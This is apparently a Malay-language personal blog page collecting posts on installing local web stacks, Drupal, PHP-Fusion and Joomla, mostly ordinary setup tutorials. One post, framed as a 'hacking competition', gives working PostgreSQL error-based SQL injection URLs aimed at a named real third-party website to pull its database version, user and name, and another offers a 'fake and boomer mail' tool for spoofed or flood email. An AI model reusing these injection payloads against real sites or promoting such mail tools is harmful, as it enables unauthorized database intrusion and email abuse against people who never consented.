Install Open Source CMS dengan mudah



BitNami stacks make it incredibly easy to install your favorite open source software. Application stacks include an open source application and all the dependencies necessary to run it, such as Apache, MySQL and PHP or Ruby. All you need to do is download the Stack, provide a few pieces of information when prompted by the installation wizard, and that's it. By the time you click 'finish', your new application will be ready to run. All stacks have been packaged using BitRock's multiplatform installer.


link :

http://bitnami.org/stacks


Read Users' Comments ( 1 )

HM inter hacking competition

target domain:
http://www.mikromaailm.ee/


cari db version, db name, db user & its operating system/distro

answer vuln postgresql..

db version
http://www.mikromaailm.ee/mikro?ln=est&mid=61 and 1 = CAST(version() as int)


db user
http://www.mikromaailm.ee/mikro?ln=est&mid=61 and 1 = CAST(current_user||CHR(0) as int)


db name
http://www.mikromaailm.ee/mikro?ln=est&mid=61 and 1 = CAST(current_database()||CHR(0) as int)



http://www.mikromaailm.ee/mikro?ln=est&mid=61%20and%201%20=%20CAST(current_user||CHR(58)||current_database()||CHR(58)||version()%20as%20int)


Read Users' Comments ( 0 )

Update / Reset Joomla admin password



1. login phpmyadmin

2. klik database joomla anda

3. klik pada tab sql

4. masukkan kod dibawah ini dan klik go

UPDATE `jos_users` SET `password` = MD5( "password_baru_anda" ) WHERE `jos_users`.`username` = "admin" ;



password_baru_anda ialah password yang anda ingin update atau reset.
admin ialah username untuk login administrator page.


Read Users' Comments ( 0 )

AppServ
Concept of AppServ it is Easy to install Apache, PHP, MySQL in 1 minute. Many people in this world have problem when Install Apache, PHP, MySQL becuase use long time to configure and some time can make dizzy.
v 2.5.10

* Apache 2.2.8
* PHP 5.2.6
* MySQL 5.0.51b
* phpMyAdmin-2.10.3

Download: http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.10.exe?download

v 2.6.0
* Apache 2.2.8
* PHP 6.0.0-dev
* MySQL 6.0.4-alpha
* phpMyAdmin-2.10.3

Download: http://prdownloads.sourceforge.net/appserv/appserv-win32-2.6.0.exe?download


WAMP

WampServer is a Windows web development environment. It allows you to create web applications with Apache, PHP and the MySQL database. It also comes with PHPMyAdmin and SQLiteManager to easily manage your databases.

* Apache 2.2.8
* PHP 5.2.6 + PECL
* SQLitemanager
* MySQL 5.0.51b
* Phpmyadmin

Download: http://www.wampserver.com/dl.php


XAMPP
Many people know from their own experience that it's not easy to install an Apache web server and it gets harder if you want to add MySQL, PHP and Perl. XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.

* Apache HTTPD 2.2.9 + Openssl 0.9.8h
* MySQL 5.0.51b
* PHP 5.2.6
* PHP 4.4.8
* phpMyAdmin 2.11.7
* FileZilla FTP Server 0.9.25
* Mercury Mail Transport System 4.52

Download: http://www.apachefriends.org/en/xampp-windows.html#641


MoWeS (Portable)
MoWeS stands for the three letter abbreviation Modular Webserver System and makes it possible, to run a webserver based on Apache, MySQL and PHP from an USB Stick or any other writable media (harddrive, flash cards etc.) without installation under Windows (98 to Vista).
Download: hhttp://www.chsoftware.net/en/useware/mowes/mowes.htm?action=download


EasyPHP
EasyPHP is a complete package allowing to use all the power and the flexibility that offers the dynamic language PHP. Package includes an Apache server, a MySQL database, PHPMyAdmin as well as easy development tools for web sites and applications.
Download: http://sourceforge.net/project/showfiles.php?group_id=14045&package_id=103438&release_id=473390


Server2Go (Portable)

* Apache 1.3.x, 2.0.x and 2.2.x (V1.6.0 of Server2Go or above)
* PHP 5.2.x with a lot of Extensions. Downgrade packages to 4.4.x and 5.0.x available)
* MySQL 5 support
* Perl 5.8 with many CPAN modules integrated

Download: http://www.server2go-web.de/download/download.html


Uniform Server
The Uniform Server is a WAMP package that allows you to run a server on any MS Windows OS based computer. It is small and mobile to download or move around and can also be used or setup as a production/live server. Developers also use The Uniform Server to test their applications made with either PHP, MySQL, Perl, or the Apache HTTPd Server.
Download: http://sourceforge.net/project/showfiles.php?group_id=53691&package_id=48193


VertrigoServ

VertrigoServ has been developed as a highly professional, easy to install package consisting of Apache (HTTP web server), PHP (reflective programming language), MySQL (multithreaded, multi-user, SQL Database Management System), SQLite (ACID-compliant relational database management system), SQLiteManager (multilingual web based tool to manage SQLite database), PhpMyAdmin (tool written in PHP intended to handle the administration of MySQL) and Zend Optimizer (which increases runtime performance up to 40%) for Windows platform. With a convenient all-in-one installer, all components are installed in a single directory and can be used immediately after the installation process has completed. An uninstaller allows you to remove the VertrigoServ from hard disc. It is designed to be as small and flexible as possible and is therefore highly suitable for internet distribution. VertrigoServ is excellent both for beginners and for advanced users.
DOWNLOAD: http://prdownloads.sourceforge.net/vertrigo/Vertrigo_221.exe?download


Read Users' Comments ( 0 )

Cara-cara install Drupal di localhost

Proses Install Drupal Di Localhost



First dapatkan drupal di http://drupal.org/project/drupal.

1. Extract kan fail yang telah didownload dan letakkan dalam directory root anda. Contoh c:\wamp\www. Untuk memudah kerja, rename folder tersebut kepada drupal sahaja.

2. Buka phpmyadmin untuk create database. Contohnya create nama drupal.




3. Buka browser anda dan taip http://localhost/drupal.



4. Klik install Drupal. Mesej tersebut akan terpapar.



5. Buka directory c:\wamp\www\drupal\sites\default. Rename file default.settings.php kepada settings.php. Refresh kembali browser anda.

6. Seterusnya masukkan,
nama database : drupal
username database : root
password database :



Klik save and continue. Jika anda mendapat paparan yang sama, buka file setting.php dan cari perkataan $db_url = 'mysql://username:password@localhost/databasename';
dan ubahkan kepada ini $db_url = 'mysql://root@localhost/drupal';

7. Isikan kesemua ruangan yang bertanda * . Kemudian klik save and continue.



8. Jika anda mendapat mesej ini, sila abaikan kerana ia adalah ralat drupal pada installation di localhost.



9. Klik your new site dan inilah hasilnya.



Downlaod tutorial by try
http://www.mediafire.com/?jmfmwowoy2y
http://rapidshare.com/files/235786745/Proses_Install_Drupal_Di_Localhost.rar


Read Users' Comments ( 2 )

Simple Ajax Shoutbox




download source code :

http://www.usaupload.net/d/uy5xa8rt9ox


Read Users' Comments ( 0 )

Cara-cara install PHP Fusion Core 7

First dapatkan file di http://php-fusion.co.uk/downloads.php

1. Selepas selesai mendownload,extract file tersebut.Terdapat 2 folder iaitu files dan upgrade v601x. Copy kesemua file dlm folder files tersebut dan letak kan didalam root directory anda..contoh c:\wamp\www\




Kemudian rename file _config.php kepada config.php . Jika upload ke web hosting sila tuka permission kepada 777 untuk file dibawah ini

· administration/db_backups
· images/
· images/list.js
· images/articles/
· images/avatars/
· images/news/
· images/news_cats/
· images/photoalbum/
· images/photoalbum/submissions/
· forum/attachments
· config.php


2. Buka web browser dan buka file yang telah diletakkan didalam root directory tadi..contoh http://localhost/files



Klik next untuk teruskan.


3. Permission semua file yang telah disenaraikan tadi akan di check.



4.
Database Hostname : Nama hosting/localhost
Database Username : Username database hosting/localhost
Database Password : Password database
Database Name : Nama database
Tabel Prefix : fusion_


Gunakan PHPMyAdmin untuk create database.



Kemudian klik next.


5. Jika berjaya.



Kemudian klik next.



6. Seterus nya ialah konfigurasi untuk admin/owner site.

Username : Username untuk Super Administrator

Login Password : Password untuk login Super Adminsitrator

Repeat Login Passwoard : Ulang balik password tadi

Admin Password : Password untuk melakukan perubahan pada admin panel (seharusnya lain dari password tadi)

Repeat Admin Password : Ulang balik password tadi

Email Address : Email owner yang mana email ini akan menjadi email yang akan di hantar semasa proses verify email semasa user melakukan pendaftaran menjadi member.



Kemudian klik next.

7. Selesai proses installation. Delete file setup.php . Kalau didalam web hosting,tukar permission config.php kepada 644.




8. Inilah hasilnya..



Read Users' Comments ( 0 )

Cara-cara install Wamp Server



1. Klik yes untuk install



2. Klik next untuk teruskan



3. Tandakan pada I agree untuk bersetuju dengan syarat yang dinyatakan



4. Klik next untuk install pada c:\wamp



5. Tandakan jika ingin membuat desktop ikon. Jika tidak biarkan sahaja dan klik next.



6. Klik install untuk memulakan proses installation.

7. Pilihan default web browser terpulang kepada anda samada IE ataupun firefox.

8. Directory untuk document root ialah c:/wamp/www

9. Klik finish dan pengujian localhost boleh dilakukan.



Read Users' Comments ( 1 )

Simple Fake And Boomer Mail





Download File :

Simple Fake And Boomer Mail


Read Users' Comments ( 0 )